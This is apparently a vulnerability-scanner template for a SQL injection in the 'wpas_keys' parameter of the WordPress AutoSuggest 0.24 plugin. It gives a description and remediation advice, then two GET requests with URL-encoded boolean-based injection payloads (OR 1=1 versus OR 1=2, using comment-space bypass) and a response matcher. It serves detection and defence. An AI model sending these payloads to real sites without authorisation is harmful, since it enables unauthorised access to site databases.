id: CNVD-2018-26453
info:
  name: WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection
  author:
  - l0ne1y
  description: |-
    WordPress Plugin AutoSuggest 'wpas_keys' SQL Injection Vulnerability
    WordPress is a blog platform developed by the WordPress Software Foundation using the PHP language. The platform supports the establishment of personal blog websites on PHP and MySQL servers.

    The WordPress plugin AutoSuggest 'wpas_keys' has a SQL injection vulnerability. An attacker can exploit the vulnerability to obtain sensitive database information.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/wp-autosuggest/

    Temporary fix:
    1. Use precompiled statements. When using PDO, be careful not to splice variables directly into PDO statements. All query statements use the parameterized query interface provided by the database. Parameterized statements use parameters instead of embedding user input variables into the SQL statement. Almost all current database systems provide parameterized SQL statement execution interfaces. Using this interface can very effectively prevent SQL injection attacks.
    2. Escape or code the special characters (’”<>&*;, etc.) that enter the database.
    3. Confirm the type of each data. For example, numeric data must be numbers, and the storage fields in the database must correspond to int types.
    4. The data length should be strictly specified, which can prevent relatively long SQL injection statements from being executed correctly to a certain extent.
    5. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding for all data. Inconsistent encoding of the upper and lower layers may cause some filtering models to be bypassed.
    6. Strictly limit the database operation permissions of website users, and provide this user with permissions that are only sufficient for his or her work, thereby minimizing the harm of injection attacks to the database.
    7. Prevent the website from displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
    8. Filter dangerous characters, for example: use regular expressions to match keywords such as union, sleep, and, select, load_file, etc. If a match is found, the operation will be terminated.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code_1==200 && status_code_2==200
    - contains(body_1,"rs id=") && !contains(body_2,"rs id=")
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%25%27%2f%2a%2a%2fOR%2f%2a%2a%2f1%3D1%2f%2a%2a%2fAND%2f%2a%2a%2f%27%25%27%3D%27'
  - '{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%25%27%2f%2a%2a%2fOR%2f%2a%2a%2f1%3D2%2f%2a%2a%2fAND%2f%2a%2a%2f%27%25%27%3D%27'
  method: GET
